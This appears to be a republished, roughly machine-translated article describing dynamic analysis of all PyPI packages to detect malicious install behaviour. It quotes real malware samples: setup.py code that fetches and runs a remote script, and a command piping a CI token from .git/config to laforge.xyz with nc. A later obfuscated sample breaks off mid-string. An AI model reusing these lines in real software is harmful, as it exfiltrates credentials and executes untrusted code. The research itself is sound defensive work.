How to find malicious software packages on PyPI 07/12 Update SLTechnology News&Howtos

How to find malicious software packages on PyPI

2025-07-12 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)06/01 Report--

How to find malicious software packages on PyPI, for this problem, this article details the corresponding analysis and solutions, hoping to help more small partners who want to solve this problem find a simpler and easier way.

About a year ago, the Python Software Foundation (RFI) published a Request for Information (RFI) on how to detect malware packages uploaded to PyPI, which is obviously a practical problem affecting almost every package manager.

In fact, package managers like PyPI are critical infrastructure that almost every company relies on. This is an area of interest to me, so I respond with my thoughts on how we should approach this problem. In this article, I'll detail how to install and analyze each package in PyPI and look for potential malicious activity within it.

How to find malicious libraries

In order to execute arbitrary commands during package installation, developers usually add code to the setup.py file in the code package, see this code base for details.

From a big perspective, we have two ways to find potentially malicious dependencies, namely static analysis and dynamic analysis. Although static analysis is interesting, this article mainly uses dynamic analysis methods.

So what exactly are we looking for?

The first thing to know is that a lot of important things are done by the kernel. Common programs (such as pip) that want the kernel to perform a task typically do so by using syscalls, or system calls. Opening files, establishing network connections, and executing commands are all done through system calls.

This also means that if we can monitor system calls during a Python package installation, we can look for any suspicious events. The nice thing about this is that no matter how many layers of obfuscation the malicious code goes through, we can always see what the code is actually trying to do.

Now, all we have to do is monitor system calls, so what do we do?

Monitoring system calls using Sysdig

In fact, the community already provides a number of tools to help us monitor system calls. For our purposes, I chose Sysdig because it provides structured output and helps us filter the data well.

To achieve this, when I started the Docker container for the installation package, I also started a Sysdig process that only monitors events from that container. In addition, I filtered out web reads and writes related to pypi.org or files.pythonhosted.com because they were unrelated to our goal.

Now that we have a way to catch system calls, there is one more problem that has to be solved, namely how to get a complete list of all available PyPI packages.

Get Python packages

Fortunately, PyPI provides an API called "Simple API," which can be thought of as a large HTML page containing links to each package. We can crawl the information on this page and use pup to parse the links, so we can get about 268000 packages:

❯ curl https://pypi.org/simple/ | pup 'a text{}' > pypi_full.txt ❯ wc -l pypi_full.txt 268038 pypi_full.txt

For our experimental scenario, all we need is the latest version of each package, and our pipeline is as follows:

In short, we send the name of each package to a set of EC2 instances, which can get some metadata about the package from PyPI, and then launch sysdig and a series of containers to install the package via pip, collecting system calls and network traffic at the same time. All data is then transferred to S3 for subsequent analysis.

The whole process is shown below:

When this is done, we will store approximately 1TB of data in an S3 Bucket, which contains approximately 245000 software packages. After we clean up the metadata and output, we get a series of JSON files:

{ "metadata": {}, "output": { "dns": [], // Any DNS requests made "files": [], // All file access operations "connections": [], // TCP connections established "commands": [], // Any commands executed }}

Then I wrote a series of scripts to aggregate the data, trying to analyze the behavior of the code, and let's dig into the results.

network request

There are many reasons why a package needs to make a network connection during installation. They may require downloading legitimate binary components or other resources, or they may be trying to extract data or credentials from the system.

We found that 460 of these packets would establish network connections with 109 individual hosts. As mentioned above, quite a bit of this is the result of packages sharing dependencies that make network connections. However, we can filter out these by mapping dependencies.

command execution

As with network connections, there are good reasons for packages to run system commands during installation, such as compiling native binaries and setting up the correct environment. Looking through our sample set, we found 60725 packages that execute commands during installation. Just like network connections, we must remember that many connections are initiated by dependencies downstream of the package that runs the command.

Interesting software package

A closer look reveals that most network connections and commands appear to be legitimate. But I want to use some strange behaviors as case studies to illustrate how useful this analysis can be.

i-am-malicious

Here, we found a packet called i-am-malicious, which is a malicious packet. If the name of the bag isn't obvious enough, the following details prove it all:

{ "dns": [{ "name": "gist.githubusercontent.com", "addresses": [ "199.232.64.133" ] }] ], "files": [ ... { "filename": "/tmp/malicious.py", "flag": "O_RDONLY|O_CLOEXEC" }, ... { "filename": "/tmp/malicious-was-here", "flag": "O_TRUNC|O_CREAT|O_WRONLY|O_CLOEXEC" }, ... ], "commands": [ "python /tmp/malicious.py" ]}

We see that it connects to gist.github.com, executes a Python file, and creates a file called "/tmp/malicious-was-here." Sure enough, all of these are implemented using setup.py:

from urllib.request import urlopen handler = urlopen("https://gist.githubusercontent.com/moser/49e6c40421a9c16a114bed73c51d899d/raw/fcdff7e08f5234a726865bb3e02a3cc473cecda7/malicious.py")with open("/tmp/malicious.py", "wb") as fp: fp.write(handler.read()) import subprocess subprocess.call(["python", "/tmp/malicious.py"])maliciouspackage

Another malicious package even changed its name to maliciouspackage. Here is the relevant output:

{ "dns": [{ "name": "laforge.xyz", "addresses": [ "34.82.112.63" ] }], "files": [ { "filename": "/app/.git/config", "flag": "O_RDONLY" }, ], "commands": [ "sh -c apt install -y socat", "sh -c grep ci-token /app/.git/config | nc laforge.xyz 5566", "grep ci-token /app/.git/config", "nc laforge.xyz 5566" ]}

This package seems to extract tokens from the ".git/config" file and upload them to laforge.xyz. By analyzing its setup.py, we can see the following:

... import osos.system('apt install -y socat')os.system('grep ci-token /app/.git/config | nc laforge.xyz 5566')easyIoCtl

There is also a package called easyIoCtl that claims to abstract IO operations, but we found that it executes the following commands:

[ "sh -c touch /tmp/testing123", "touch /tmp/testing123"]

This is suspicious, but not necessarily malicious. But this example is a good example of how we can trace system calls. Here is the setup.py file for the project:

class MyInstall(): def run(self): control_flow_guard_controls = 'l0nE@`eBYNQ)Wg+-,ka}fM(=2v4AVp! [dR/\\ZDF9s\x0c~PO%yc X3UK:.w\x0bL$Ijq

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.